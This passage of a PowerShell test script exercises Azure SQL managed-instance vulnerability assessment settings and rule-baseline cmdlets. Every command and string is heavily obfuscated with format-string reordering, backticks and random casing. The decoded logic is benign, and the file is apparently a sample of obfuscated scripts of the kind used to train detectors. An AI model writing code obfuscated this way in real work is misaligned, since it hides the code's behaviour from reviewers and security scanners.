		&("{9}{6}{1}{0}{11}{8}{2}{7}{3}{4}{10}{5}"-f'-','le','stanceAdva','edDa','ta','rity','ab','nc','n','En','Secu','AzSqlI') -ResourceGroupName ${PA`RAms}."RgNa`ME" -InstanceName ${Pa`Rams}."Se`Rver`NAMe" -DoNotConfigureVulnerabilityAssessment

		&("{5}{2}{1}{3}{4}{0}"-f'ains','h','ert-T','rowsC','ont','Ass') -script { &("{14}{10}{11}{4}{8}{3}{0}{6}{5}{2}{12}{9}{7}{1}{13}"-f 'st','t','baseV','n','t','Data','ance','tyAssessmentSe','e-AzSqlI','i','p','da','ulnerabil','ting','U') -ResourceGroupName ${p`AR`AMS}."RGna`mE" -InstanceName ${pa`R`AmS}."serve`RN`A`mE" -DatabaseName ${Pa`Ra`ms}."Data`BAs`eNaME" `
		 -StorageAccountName ${P`ArA`mS}."st`Ora`G`EAcC`ouNt" -EmailAdmins ${Tr`UE} -NotificationEmail @(("{1}{2}{0}"-f'dMail','inva','li')) -RecurringScansInterval ("{1}{0}"-f 'ly','Week') } `
		 -message ("{5}{6}{3}{1}{9}{0}{8}{2}{7}{12}{10}{4}{11}" -f'the ',' m','ma','e or','ot vali','O','n','il ','e','ore of ','are n','d..','addresses you entered ')

		&("{1}{5}{2}{0}{3}{4}" -f 'hrowsCo','As','ert-T','ntain','s','s') -script { &("{7}{2}{4}{9}{12}{5}{13}{3}{15}{10}{1}{14}{8}{6}{11}{0}"-f'tting','erabilityAs','pd','D','ate','anc','entS','U','ssm','-AzSqlIn','eVuln','e','st','e','se','atabas') -ResourceGroupName ${p`ARamS}."rGNA`mE" -InstanceName ${p`A`RAMS}."S`er`VernaME" -DatabaseName ${PA`Ra`MS}."d`A`TabAse`Name" `
		 -BlobStorageSasUri ("{8}{2}{7}{4}{6}{13}{1}{5}{12}{10}{0}{11}{14}{3}{9}" -f'tXXX','ore.w','ps:/','XXX','nvalid.','in','b','/i','htt','XXX','e','XXXXX','dows.n','lob.c','X')} `
		 -message ("{9}{19}{26}{17}{18}{4}{11}{12}{8}{6}{25}{7}{22}{20}{13}{5}{27}{2}{21}{1}{23}{3}{16}{0}{15}{14}{10}{24}" -f'it','s.net/vu','.blob.co','era','parameter val','/m',' f','r',' be in','Inv','XXXXX','ue. The va','lue should','tps:/','ssessment?st=','y-a','bil','bStorageSasUr','i ','alid B','t of ht','re.window','ma','ln','X.','o','lo','ystorage')

		&("{10}{7}{2}{9}{8}{5}{13}{12}{0}{14}{4}{6}{1}{11}{15}{3}" -f 'abi','ssme','e','tting','i','Vu','tyAsse','AzSqlInstanc','base','Data','Update-','ntS','r','lne','l','e') -ResourceGroupName ${P`A`RAms}."rgn`AmE" -InstanceName ${p`Ara`Ms}."serv`Er`NAME" -DatabaseName ${Pa`R`Ams}."DAT`AbAseN`A`me" `
			 -StorageAccountName ${P`ARa`ms}."STO`Rag`eaCcOunt"

		
		${se`TT`INGs} = &("{4}{2}{1}{5}{3}{7}{8}{6}{0}{9}"-f't','Instance','t-AzSql','Vulne','Ge','Database','n','rabilityAss','essme','Setting') -ResourceGroupName ${parA`mS}."RG`NaMe" -InstanceName ${pA`RaMS}."ServErN`A`me" -DatabaseName ${P`AR`AMs}."da`T`AbAs`EnAME" 
		
		
		&("{0}{4}{2}{1}{3}" -f'As','-Ar','ert','eEqual','s') ${pA`RAmS}."rg`NAMe" ${s`eT`TInGs}."Reso`U`RCE`gRo`U`PNAme"
		&("{0}{3}{1}{2}"-f'Asser','eEqua','l','t-Ar') ${Par`AmS}."Se`RvEr`NAme" ${SeTti`N`gs}."In`st`ANcEnaMe"
		&("{4}{0}{3}{2}{1}" -f's','Equal','-Are','ert','As') ${par`A`mS}."Data`BA`s`ENamE" ${S`Ett`INGs}."DA`T`AbaS`eNaME"
		&("{3}{2}{1}{0}"-f 'eEqual','rt-Ar','se','As') ("{5}{6}{4}{2}{3}{0}{1}" -f'sme','nt','ility-asse','s','rab','vu','lne') ${SETTi`N`Gs}."SCaNReSU`lTs`C`o`N`T`AinErNAme"
		&("{1}{2}{0}{3}" -f 'q','Assert-A','reE','ual') ${P`Ar`AMS}."St`o`RAGeA`CCo`UNt" ${SEt`T`INGS}."sTorA`geacCOun`Tn`A`Me"	
		&("{4}{3}{1}{2}{0}"-f 'al','r','eEqu','sert-A','As') ("{0}{1}"-f'Non','e') ${sE`T`TINgS}."Re`c`UrrinG`sC`ANsi`NTeRVal"
		&("{3}{0}{1}{2}" -f '-AreEq','u','al','Assert') ${tr`UE} ${SE`T`TiNGS}."E`maiLAdM`inS"
		&("{1}{0}{5}{3}{4}{2}{6}"-f 's','A','EqualAr','t','-Are','ser','ray') @() ${sET`Ti`Ngs}."NoTIfICA`TionEm`A`IL"

		
		${te`stem`AiLa`DmI`Ns} = ${t`Rue}
		${t`est`N`oTI`FicaTiONemAIl} = @(("{0}{2}{3}{1}" -f'test1@mail','m','Test','.co'), ("{3}{0}{2}{1}"-f 'il','om','Test.c','test2@ma'))
		${Tes`TRe`cURRI`Ng`SCANSInTER`VAl} =   ( &('GI')  ("VaR"+"iaB"+"Le:EG4S"+"p")  )."VA`luE"::"WeEK`lY"

		&("{12}{4}{7}{2}{8}{5}{9}{3}{15}{10}{6}{13}{1}{14}{11}{0}" -f 'mentSetting','ity','zSq','ab','date','ceDa','lnerab','-A','lInstan','t','eVu','sess','Up','il','As','as') -ResourceGroupName ${pA`R`AMS}."rGNA`mE" -InstanceName ${PA`RAMs}."SERvE`RNA`ME" -DatabaseName ${pAr`A`mS}."DAtAB`AsEN`A`mE" `
			  -RecurringScansInterval ${test`R`eCURRInG`scAN`sInTerV`Al} -EmailAdmins ${T`Es`TE`mAila`DMiNs} `
			  -NotificationEmail ${TestnotIf`IcAtiOne`M`Ail}

		
		${Set`TiN`gs} = &("{2}{12}{6}{8}{7}{4}{0}{11}{3}{1}{10}{9}{5}"-f 'Databas','Asses','G','lity','stance','tSetting','-A','lIn','zSq','n','sme','eVulnerabi','et') -ResourceGroupName ${Pa`Ra`Ms}."R`GnamE" -InstanceName ${PARa`MS}."SErv`Er`NA`mE" -DatabaseName ${p`A`RAmS}."da`TaBaS`en`AmE" 

		
		&("{0}{2}{1}{3}"-f 'Asse','reEqu','rt-A','al') ${P`ARamS}."r`gnaMe" ${sE`TT`iNGS}."re`SO`Ur`cegro`UP`NAme"
		&("{3}{0}{4}{1}{2}" -f'sert','a','l','As','-AreEqu') ${pa`R`Ams}."serveR`NA`Me" ${s`Et`TIngs}."instA`NCe`N`AMe"
		&("{4}{1}{2}{0}{3}"-f 'eEqua','rt-','Ar','l','Asse') ${Pa`RAMs}."daTa`Bas`EnAME" ${S`eTtIN`gS}."Da`Ta`BAsENA`ME"
		&("{0}{3}{1}{2}" -f 'A','e','rt-AreEqual','ss') ("{0}{2}{5}{3}{4}{6}{1}"-f 'vulnerabil','t','ity-','ess','m','ass','en') ${S`Et`TiNgS}."Sc`A`Nr`EsU`LTs`Con`TainerNaME"
		&("{2}{1}{3}{0}" -f'qual','er','Ass','t-AreE') ${P`ARA`Ms}."STo`RA`geAc`c`oUnT" ${setT`I`NgS}."sTORAgEACCou`N`T`Na`mE"	
		&("{1}{0}{2}{3}"-f 'ssert-Ar','A','eE','qual') ${T`eSTrEc`UrR`inGsCan`s`inTer`Val} ${SEt`Ti`NgS}."REcuR`RIN`gscANsInt`erVal"
		&("{3}{2}{0}{1}" -f 'eEqu','al','ert-Ar','Ass') ${t`eSTEmA`ILAdmINS} ${s`E`TtiNGS}."eM`A`ilAdmI`NS"
		&("{2}{3}{0}{1}" -f'ualArra','y','Ass','ert-AreEq') ${TesT`No`TIFICa`TiONem`A`il} ${s`etti`NGS}."nOTIfIc`ATIo`NeM`AiL"

		
		&("{13}{6}{1}{8}{9}{14}{3}{11}{15}{5}{12}{17}{7}{2}{10}{16}{4}{0}" -f 'ntSetting','AzSql','y','aba','me','n','ar-','it','Instanc','e','Asse','se','era','Cle','Dat','Vul','ss','bil') -ResourceGroupName ${Pa`Ra`ms}."rGn`AmE" -InstanceName ${p`ARA`ms}."se`R`VERnaMe" -DatabaseName ${P`A`Rams}."dA`Tab`AseNaME"

		
		${sE`T`TINgS} = &("{4}{3}{9}{1}{0}{6}{8}{10}{5}{2}{7}"-f 'taba','eDa','nt','qlIn','Get-AzS','Assessme','s','Setting','eVulnerabi','stanc','lity') -ResourceGroupName ${p`AR`Ams}."R`GnAMe" -InstanceName ${paR`A`Ms}."sE`R`VeR`NAME" `
		-DatabaseName ${pa`R`AmS}."d`AtAbA`Sena`ME"

		
		&("{1}{0}{2}"-f 't-','Asser','AreEqual') ${p`ARams}."rgna`ME" ${S`E`TtINgS}."reSouR`c`eg`R`OUPn`AmE"
		&("{2}{3}{0}{4}{1}" -f'Equ','l','Ass','ert-Are','a') ${PA`RA`MS}."SER`VErN`Ame" ${set`Ti`NgS}."INsT`A`NcE`NaME"
		&("{3}{1}{2}{0}"-f 'AreEqual','e','rt-','Ass') "" ${sE`TTi`N`Gs}."SCa`NR`E`s`U`LTScOntAiNERNAme"
		&("{1}{3}{0}{2}" -f 'AreEq','Asse','ual','rt-') "" ${Se`TtINGS}."Stora`gEAC`CO`UN`TNA`ME"	
		&("{0}{2}{3}{4}{1}"-f'As','ual','se','rt-A','reEq') ("{0}{1}" -f'No','ne') ${SEttIN`gS}."R`e`Currin`gScaNSInT`ER`VAL"
		&("{3}{4}{0}{1}{2}" -f'A','reEqua','l','A','ssert-') ${t`RuE} ${sEtt`iN`Gs}."EmailAd`m`iNs"
		&("{2}{1}{0}" -f'll','ert-Nu','Ass') ${S`eTT`in`Gs}."no`TIF`iCa`Ti`One`MAiL"

		
		${tEs`TscA`Nr`eSU`lT`SCO`NTAine`Rn`AMe} = ("{3}{1}{2}{0}"-f'er','ustom-cont','ain','c')
		${T`eS`TstOraG`EnA`me} = ("{1}{0}" -f'age1','stor')
		${T`EST`BLOb`stoRagES`AsurI} = ("{1}{0}"-f'://','https') + ${t`esTstOrAge`N`AME} +("{3}{5}{0}{1}{4}{2}"-f'r','e','ows.net/','.blo','.wind','b.co') + ${TEsTscA`Nr`ES`UL`TScOn`TaiNe`RNa`me} + ("{1}{0}{2}{4}{3}"-f'st=XXXXX','?','X','XXXX','XXXXX')
		${T`eST`R`ECuRRINGScAnsin`T`eRVAL} =  (&("{2}{1}{0}"-f 'Le','iab','VaR')  ("eG4"+"sP")  )."va`LUe"::"NO`Ne"

		&("{11}{8}{10}{16}{0}{7}{1}{13}{12}{5}{2}{3}{6}{14}{4}{9}{15}"-f'n','ce','lit','y','Set','i','Assessme','stan','Sq','ti','l','Update-Az','ulnerab','DatabaseV','nt','ng','I') -ResourceGroupName ${PaR`AmS}."rg`N`AME" -InstanceName ${Pa`R`Ams}."SERV`e`RNa`mE" -DatabaseName ${P`ARa`mS}."Datab`AseN`AME" `
		 -BlobStorageSasUri ${TEST`BLobS`ToRA`g`e`SasuRI} -RecurringScansInterval ${tes`TReCUR`RInG`S`ca`Nsi`NteR`Val} -EmailAdmins ${TeSTemAILad`m`Ins} `
		 -NotificationEmail ${Te`S`TNOtif`iCaTiOnEM`AIl}
		
		
		${Ne`wdata`B`ASEName} = ("{0}{3}{4}{2}{5}{1}"-f'n','seName','anage','e','wM','dDataba');
		${t`esTNewnO`TiFICA`T`IONem`A`IL} = @(("{0}{2}{1}{3}" -f 'test3@m','t.co','ailTes','m'), ("{0}{1}{3}{2}{4}" -f't','e','t.c','st4@mailTes','om'))
		${TE`St`StOR`AgeNA`me} = ${Pa`Ra`Ms}."STo`R`AgeacCoUnT"
		${t`ES`TBlObs`TOR`Ag`ESA`Suri} = ("{1}{2}{0}" -f '/','http','s:/') + ${T`EsT`sTo`R`AGeNAMe} +("{3}{1}{4}{5}{0}{2}"-f't','blob','/','.','.core.windo','ws.ne') + ${tes`T`S`c`A`N`REsul`TscoNtaI`NErNAME} + ("{0}{2}{1}{3}{4}{5}"-f '?st','X','=XXXXXXX','X','XXX','XXX')
		${T`es`TR`eC`UrrING`S`cansI`NTERV`Al} =   ${Eg`4sP}::"N`one"

		${Co`LL`A`TIOn} = ("{1}{3}{0}{4}{2}" -f'r','S','l_CP1_CI_AS','QL_Latin1_Gene','a')
		&("{3}{4}{5}{0}{2}{1}" -f'stanc','abase','eDat','Ne','w-A','zSqlIn') -Name ${NE`wd`ATABA`sE`NAMe} -ResourceGroupName ${PAR`A`Ms}."RGN`AmE" -InstanceName ${par`AMs}."serVe`Rn`AmE" -Collation ${coL`Lat`ion}

		&("{5}{7}{4}{3}{1}{0}{12}{6}{10}{8}{2}{11}{9}"-f'stanc','n','ssessmen','AzSqlI','e-','Upda','DatabaseVulne','t','bilityA','ting','ra','tSet','e') -ResourceGroupName ${p`Ar`AmS}."r`G`NamE" -InstanceName ${P`AR`AMS}."SErV`ern`AMe" -DatabaseName ${n`eW`d`ATA`BASENA`Me} `
		 -BlobStorageSasUri ${teStblOB`sTor`A`GE`SASuri} -RecurringScansInterval ${TEsT`RE`cu`R`RIn`G`sCA`NsI`NTeRvAL} -EmailAdmins ${tEsTeMaiLAD`mi`Ns} `
		 -NotificationEmail ${T`e`sTN`ewNO`TIf`ICaTI`ONemAIl}

    	&("{6}{8}{5}{9}{13}{3}{12}{2}{0}{1}{10}{7}{4}{11}"-f'yAss','ess','Vulnerabilit','eD','tin','zS','Get','tSet','-A','qlIns','men','g','atabase','tanc') -ResourceGroupName ${Pa`Rams}."r`gn`AMe" -InstanceName ${pAR`AmS}."ser`VeR`NaMe" -DatabaseName ${NEWd`Ata`BA`SEnaME} | &("{3}{11}{7}{1}{8}{0}{5}{12}{10}{4}{2}{6}{9}" -f'nstanceDa','Sq','bi','U','era','tabas','lityAssessme','date-Az','lI','ntSetting','uln','p','eV') `
			 -ResourceGroupName ${pAR`Ams}."r`GName" -InstanceName ${pAr`AMS}."s`E`RVerna`Me" -DatabaseName ${p`ARa`mS}."DAt`Ab`Asena`me"
		${se`Tti`Ngs} = &("{0}{3}{9}{4}{11}{2}{10}{6}{1}{12}{5}{7}{8}{13}"-f 'Get-A','li','a','zSqlI','nceData','s','Vulnerabi','ess','mentSet','nsta','se','b','tyAs','ting') -ResourceGroupName ${paRA`mS}."RGn`A`mE" -InstanceName ${Pa`RAMs}."sEr`VeR`Na`me" -DatabaseName ${pAR`A`ms}."daTAbas`en`AMe" 

		&("{1}{3}{2}{0}" -f 'AreEqual','As','rt-','se') ${p`AR`AMS}."r`gname" ${seT`TiN`GS}."rES`O`URCEgRO`UpNAme"
		&("{0}{3}{4}{2}{1}" -f 'Ass','al','u','ert-Are','Eq') ${pArA`Ms}."Se`RVErna`Me" ${sEtt`I`NGS}."i`Nst`ANCeNa`mE"
		&("{2}{1}{0}{3}{4}"-f 't','sser','A','-AreEqu','al') ${P`ArAmS}."dATAB`ASeN`AMe" ${s`ETti`Ngs}."d`AT`ABasEna`Me"
		&("{0}{1}{3}{2}" -f'A','s','l','sert-AreEqua') ${tesT`SCANrESu`lt`sco`NTaIn`eR`NamE} ${SETt`i`NGS}."ScanR`eSul`T`sCo`NT`AInERnAME"
		&("{1}{3}{0}{2}" -f'eEq','As','ual','sert-Ar') ${T`EsT`sT`o`RagenAMe} ${SeTti`Ngs}."STorA`GeaCCOu`Nt`N`AME"	
		&("{3}{1}{4}{0}{2}" -f'ua','ss','l','A','ert-AreEq') ${teSTrEc`U`RrIngscaNSiN`TE`R`VAl} ${SeT`Tin`GS}."rec`U`RriN`gScANS`i`Nt`ERvaL"
		&("{0}{3}{1}{2}"-f 'Ass','Are','Equal','ert-') ${TesTemAI`l`A`dmiNs} ${S`EtTi`Ngs}."emAiLAdm`i`NS"
		&("{3}{2}{1}{0}{4}"-f 'rra','lA','a','Assert-AreEqu','y') ${te`sTne`WNo`TIFiC`AtIOne`mA`iL} ${s`eTtings}."N`OtIF`icatI`ONe`Mail"

		
		${seT`TingS} = &("{1}{4}{5}{0}{2}{3}" -f 'nceD','G','atab','ase','et-AzS','qlInsta') -ResourceGroupName ${par`AmS}."rG`NA`Me" -InstanceName ${PA`Ra`Ms}."Se`RVE`RNAmE" -Name ${P`Ar`AMS}."data`B`ASenaME" | &("{5}{3}{0}{7}{14}{11}{6}{2}{12}{1}{13}{4}{9}{8}{15}{10}" -f'zSql','it','seVuln','-A','ssm','Get','taba','I','tti','entSe','g','tanceDa','erabil','yAsse','ns','n') 
		 
		
		&("{2}{3}{4}{1}{0}"-f'AreEqual','t-','A','sse','r') ${PAR`Ams}."r`G`NaME" ${SETTin`gs}."reS`ou`R`CEg`RO`UpNAmE"
		&("{0}{4}{1}{2}{3}"-f 'Asser','-AreE','q','ual','t') ${parA`MS}."sERver`Na`ME" ${S`E`TT`INgS}."iN`S`Tanc`EnaMe"
		&("{4}{3}{1}{0}{2}" -f 'u','eEq','al','ert-Ar','Ass') ${PA`RA`Ms}."DatAbAsE`N`AME" ${SeTtI`N`gS}."daT`AbasEN`AMe"
		&("{0}{2}{1}{3}"-f 'As','t-Are','ser','Equal') ${tE`s`T`scAnr`esulTSCoN`TA`iNeRn`AmE} ${s`eTT`INgs}."SCanReS`U`LT`ScOn`TAinER`NAME"
		&("{1}{3}{2}{0}" -f 'qual','A','AreE','ssert-') ${tesTsT`oR`AGeNa`me} ${SetT`IN`Gs}."st`oraG`EaCcOU`N`TnAme"	
		&("{0}{3}{1}{4}{2}"-f'Ass','rt-','qual','e','AreE') ${teSTR`Ec`U`RrIngsCaNsIn`T`eRvaL} ${s`e`TTI`NGS}."r`E`cUr`RiN`G`scaNsiNtEr`VAl"
		&("{1}{2}{0}" -f'eEqual','Asser','t-Ar') ${te`sTeMAiLADmI`Ns} ${Sett`iN`GS}."emailADm`I`Ns"
		&("{0}{4}{1}{2}{3}{6}{5}"-f 'Assert','reE','qual','Arr','-A','y','a') ${t`Est`NeWnO`T`IFIcaTi`o`N`eMaIl} ${s`etTIN`gs}."nO`Tifi`cAtione`mAil"

		
		${SeTTin`Gs} = &("{5}{1}{0}{3}{4}{6}{2}" -f 't-','e','se','A','zSqlInstanc','G','eDataba') -ResourceGroupName ${pAR`AmS}."rG`NamE" -InstanceName ${Para`MS}."sErVE`R`Na`mE" -Name ${p`A`RAms}."DA`T`AB`AsenamE" | &("{13}{0}{10}{7}{8}{4}{9}{11}{2}{5}{1}{6}{12}{3}" -f 'zSqlI','ntS','ility','g','abaseV','Assessme','etti','ceD','at','ulner','nstan','ab','n','Clear-A') 
		 
		
		&("{2}{0}{1}"-f 'Nul','l','Assert-') ${sEt`TiN`gs}

		
		${T`ESTE`Ma`i`lAdmINS} = ${fA`LsE}
		${TE`STR`ecUrRiNG`s`cA`NSI`NtErVal} =   (  &('lS')  ("{0}{3}{2}{4}{1}"-f 'VAriAB','sp',':eG','lE','4'))."vAl`Ue"::"W`eEKLY"
		&("{3}{10}{15}{12}{7}{11}{13}{4}{6}{0}{5}{8}{1}{9}{14}{2}" -f'eDatabaseVulner','i','etting','Upd','Inst','a','anc','S','b','lityAssessmen','ate','q','Az','l','tS','-') -ResourceGroupName ${PA`Ra`Ms}."r`Gn`Ame" -InstanceName ${pA`RA`ms}."s`ERvE`RNAMe" -DatabaseName ${PaR`A`Ms}."DATABAs`e`NAMe" `
			  -StorageAccountName ${p`ArAmS}."S`T`ORaGe`AccOunT" -RecurringScansInterval ${TEs`TreCurRiN`GScA`NsiNtERV`Al} -EmailAdmins ${TES`TEm`AILaD`m`I`NS}

		
		${seTt`in`Gs} = &("{2}{6}{4}{7}{9}{1}{8}{5}{3}{0}" -f'etting','lnera','Ge','mentS','qlInstance','ilityAssess','t-AzS','Databas','b','eVu') -ResourceGroupName ${paRA`mS}."RGna`ME" -InstanceName ${p`A`RAms}."S`Er`VeRnAmE" -DatabaseName ${p`ARAMS}."DATabAs`eNA`mE" 
		&("{3}{2}{1}{0}{4}"-f'Equ','e','Ar','Assert-','al') ${pA`Ra`Ms}."RGn`AME" ${SET`TIn`Gs}."RE`SouRc`E`grOuP`NAmE"
		&("{2}{4}{3}{1}{0}"-f'ual','Eq','Assert','re','-A') ${p`Ara`mS}."sERV`ERN`Ame" ${sET`T`ingS}."iN`st`AnCenA`ME"
		&("{0}{3}{2}{1}" -f 'Ass','al','u','ert-AreEq') ${p`Ar`AMs}."DAtA`BAs`ENa`me" ${SETt`I`Ngs}."D`A`TAbaSe`NaMe"
		&("{0}{2}{1}{3}" -f'Ass','t-Are','er','Equal') ${pAR`A`MS}."sTORag`eA`C`COu`Nt" ${SeTt`INGs}."S`TOrageA`ccoU`NtN`AmE"	
		&("{1}{2}{0}{3}" -f't-A','A','sser','reEqual') ${tEsT`ReCuRR`inGS`cANS`i`NtERVal} ${SeT`T`IngS}."RecurRiNG`SC`A`NSint`E`RVAL"
		&("{1}{0}{2}{3}"-f 'ssert-AreE','A','qu','al') ${T`eSTe`mA`iLAdmINS} ${s`etTI`NgS}."ema`Il`AdMinS"
		&("{0}{1}{2}"-f 'A','ssert-N','ull') ${sE`T`TiNGS}."n`otifI`catIoNEm`AIl"

		
		&("{7}{8}{0}{4}{1}{3}{5}{2}{9}{6}"-f 'ar','nceDataba','il','seV','-AzSqlInsta','ulnerab','mentSetting','C','le','ityAssess') -ResourceGroupName ${Pa`RaMs}."R`gNaMe" -InstanceName ${p`AR`AMs}."seRvE`R`Name" -DatabaseName ${P`ArA`Ms}."DA`TaBAS`en`Ame"

		
		&("{4}{2}{9}{1}{8}{5}{0}{7}{6}{3}"-f'yA','nstanceData','Sql','smentSetting','Update-Az','erabilit','s','sse','baseVuln','I') -ResourceGroupName ${pAR`A`Ms}."Rg`Na`Me" -InstanceName ${pA`RA`MS}."sER`VErn`AME" -DatabaseName ${pa`RA`mS}."dAtAb`As`en`AME" `
		  -StorageAccountName ${p`ARA`ms}."Sto`R`AGEa`ccouNT" -WhatIf

		
		${SeTT`INGs} = &("{9}{3}{7}{1}{8}{11}{6}{5}{2}{0}{10}{13}{12}{4}"-f 'yAsse','nce','t','Sq','g','li','ulnerabi','lInsta','Dat','Get-Az','s','abaseV','mentSettin','s') -ResourceGroupName ${PA`RAmS}."RGn`A`mE" -InstanceName ${p`AR`AMS}."sEr`VER`NAME" `
		-DatabaseName ${P`AR`Ams}."D`ATabAseNa`mE"

		
		&("{2}{3}{1}{4}{0}" -f'-AreEqual','r','A','sse','t') ${PaRA`mS}."RG`NAme" ${seT`Ti`Ngs}."ReSOUr`c`eg`R`OupNAMe"
		&("{3}{4}{1}{0}{2}" -f 'Equa','e','l','As','sert-Ar') ${P`ARA`ms}."sErv`e`RN`AMe" ${sE`T`TINgS}."In`s`TanC`eName"
		&("{0}{3}{1}{2}" -f 'As','q','ual','sert-AreE') "" ${s`Ett`IN`GS}."ScAnr`e`SUl`TSCONTainErNA`Me"
		&("{4}{3}{2}{1}{0}" -f 'l','a','eEqu','-Ar','Assert') "" ${s`eTt`inGs}."STOr`AGEAc`C`oU`NTNamE"	
		&("{1}{4}{2}{0}{3}"-f'qua','Asser','eE','l','t-Ar') ("{0}{1}" -f 'N','one') ${set`T`iNgS}."ReCU`Rring`sc`Ans`Inte`R`VAl"
		&("{1}{0}{3}{2}{4}" -f'ssert','A','Are','-','Equal') ${T`RUE} ${seTTI`N`Gs}."eMAiLA`D`MiNs"
		&("{1}{0}{2}{3}"-f 'sert-N','As','u','ll') ${s`et`TiN`gs}."n`Ot`IF`I`cAtIon`eMaIl"

		
		&("{9}{3}{6}{0}{2}{1}{7}{4}{5}{8}" -f'aba','ulnerability','seV','e-Az','ssess','m','SqlInstanceDat','A','entSetting','Updat') -ResourceGroupName ${pA`RA`MS}."RgN`AMe" -InstanceName ${pA`RA`ms}."ser`V`erNamE" -DatabaseName ${p`ArA`ms}."dATA`BaseNa`mE" `
		 -BlobStorageSasUri ${TeSTblO`B`S`TOR`AgESa`Su`RI}

		&("{2}{7}{5}{10}{8}{3}{12}{9}{6}{14}{0}{1}{11}{4}{15}{13}" -f'i','tyAssessm','Clear','DatabaseV','et','lI','rab','-AzSq','ance','ne','nst','entS','ul','g','il','tin') -ResourceGroupName ${Par`Ams}."Rgn`AME" -InstanceName ${P`Ara`ms}."S`eRvernA`Me" -DatabaseName ${Pa`RA`Ms}."d`AtaBASeNA`ME" `
		-WhatIf
		
		
		&("{13}{9}{8}{11}{7}{12}{0}{3}{5}{4}{2}{1}{6}{10}"-f 'se','essmentS','Ass','Vulnera','ty','bili','et','an','SqlI','et-Az','ting','nst','ceDataba','G') -ResourceGroupName ${P`A`RAms}."Rgn`Ame" -InstanceName ${PAR`AMS}."SErV`E`RnA`ME" `
		-DatabaseName ${p`ArAMs}."dATa`BASena`ME"
	}
	finally
	{
		
		&("{0}{10}{17}{6}{12}{7}{11}{3}{15}{8}{2}{16}{9}{1}{4}{14}{13}{5}" -f 'Remo','Ins','g','entMa','tanceTestEnv','nt','l','ses','a','d','ve','sm','ityAs','nme','iro','n','e','-Vulnerabi') ${tEst`S`UFF`ix}
	}
}


function teST-`VU`lN`eRaBILiTYASS`esSmEN`TmANagedD`AT`AbASeBasE`l`iN`ETest
{
	
	${T`Es`TS`UfFiX} = &("{2}{0}{1}" -f 'AssetNam','e','get')
	&("{10}{9}{7}{11}{6}{13}{3}{5}{4}{14}{2}{8}{12}{1}{0}" -f 't','en','n','I','anc','nst','g','sessmentMan','vir','erabilityAs','Create-Vuln','a','onm','ed','eTestE') ${tesT`S`UFFiX}
	${pA`R`Ams} = &("{1}{14}{11}{8}{5}{2}{3}{13}{16}{0}{15}{12}{17}{7}{10}{9}{4}{6}" -f 'T','Get-Sq','Assessm','entManage','mete','y','rs','P','it','ra','a','lnerabil','onme','d','lVu','estEnvir','Instance','nt') ${tEST`S`UfF`iX}

	try
	{
		
		&("{8}{3}{6}{10}{5}{9}{1}{0}{4}{7}{2}"-f 'Da','nced','ity','nab','taS','SqlInstance','le','ecur','E','Adva','-Az') -ResourceGroupName ${paR`AMs}."rgnA`Me" -InstanceName ${par`A`Ms}."sErV`ER`N`AME" -DoNotConfigureVulnerabilityAssessment

		&("{11}{2}{4}{10}{12}{5}{1}{9}{3}{0}{7}{6}{8}" -f'lityA','nceDatabaseV','te-','erabi','A','sta','s','s','essmentSetting','uln','zSqlI','Upda','n') -ResourceGroupName ${P`A`RamS}."R`Gn`AmE" -InstanceName ${p`AR`Ams}."SEr`VErNa`Me" -DatabaseName ${PaRa`mS}."da`T`ABasEN`AmE" `
			 -StorageAccountName ${Pa`R`AMS}."sTO`R`AgEACCoUNt"

		${rul`eiD} = ("{1}{0}" -f'108','VA2')

		
		${BASe`L`in`eD`oEsN`TeX`IST`s`erRORMESSaGE} = ((("{4}{10}{8}{2}{3}{5}{0}{1}{6}{7}{9}" -f ' for',' ru','not ex','i','Baseline','st','le',' N6','does ','gVA2108N6g.',' '))."rEp`L`ACE"(([CHaR]78+[CHaR]54+[CHaR]103),[STRING][CHaR]39))
		&("{3}{1}{4}{0}{5}{2}" -f'o','rt-T','tains','Asse','hr','wsCon') -script { &("{6}{0}{10}{5}{12}{13}{8}{1}{15}{16}{3}{2}{9}{7}{11}{4}{14}"-f't-','ataba','bil','lnera','ent','S','Ge','s','D','ityAsse','Az','sm','ql','Instance','RuleBaseline','seV','u') -ResourceGroupName ${PAR`AMs}."r`G`NAmE" -InstanceName ${par`AmS}."SeR`VE`RnamE" `
		-DatabaseName ${Pa`Ra`MS}."DA`TABA`sENAMe" -RuleId ${r`Uleid} } -message ${B`ASE`LINED`OES`NtExiS`TS`ErrORMEsSagE}

		&("{4}{2}{0}{1}{3}" -f '-Throws','Conta','ssert','ins','A') -script { &("{3}{8}{7}{6}{0}{9}{5}{10}{1}{2}{4}" -f'n','abilityAssessm','entRuleB','Clea','aseline','DatabaseVuln','qlInsta','zS','r-A','ce','er') -ResourceGroupName ${Pa`Ra`MS}."rgnA`me" -InstanceName ${P`ARa`Ms}."sE`RV`eRNAmE" `
		-DatabaseName ${pa`RA`MS}."DAtA`Ba`seNaMe" -RuleId ${ruL`EID} } -message ${BaSEliN`eDOeSn`TE`xIsTsErRO`RMes`sagE}

		
		${BASEl`iN`E`T`OsET} = @( ("{1}{0}{2}" -f 'ncipal','Pri','1'), ("{3}{1}{2}{0}" -f'in','la','dm','db_dd'), ("{2}{1}{0}" -f'SER','U','SQL_'), ("{1}{0}" -f'one','N')), @( ("{0}{2}{1}" -f 'Pr','pal2','inci'), ("{2}{1}{0}"-f 'dmin','_ddla','db'), ("{1}{0}"-f 'ER','SQL_US'), ("{0}{1}"-f'No','ne'))
		&("{9}{0}{3}{8}{10}{7}{4}{6}{1}{5}{2}"-f'et-AzSqlInstance','e','aseline','Da','ityA','B','ssessmentRul','seVulnerabil','t','S','aba') -ResourceGroupName ${p`Ar`AMS}."r`gna`Me" -InstanceName ${PA`RA`Ms}."SERVe`R`NaME" -DatabaseName ${Pa`RAmS}."DATa`BA`SE`NAMe" `
		-RuleId ${RuL`E`Id} -BaselineResult ${base`l`I`NEToSEt}
		
		
		${BaS`EL`INe} = &("{13}{1}{8}{5}{11}{7}{0}{6}{9}{2}{4}{10}{3}{12}" -f'as','t-AzSqlInst','tyAsses','aselin','smen','n','eVulnerab','Datab','a','ili','tRuleB','ce','e','Ge') -ResourceGroupName ${PA`RAMs}."rgN`Ame" -InstanceName ${Pa`Ra`Ms}."sE`R`VeR`NAmE" -DatabaseName ${p`ArAmS}."D`AtAB`AsenAME" `
		-RuleId ${RuL`e`Id}

		&("{1}{0}{2}"-f'sert-Are','As','Equal') ${pA`RaMs}."RG`NamE" ${b`ASEL`INE}."REsOURceG`RO`Upna`mE"
		&("{2}{3}{0}{1}"-f 'qua','l','Assert','-AreE') ${P`Ara`Ms}."sERv`ErN`AME" ${Basel`INe}."INST`AncE`NA`ME"
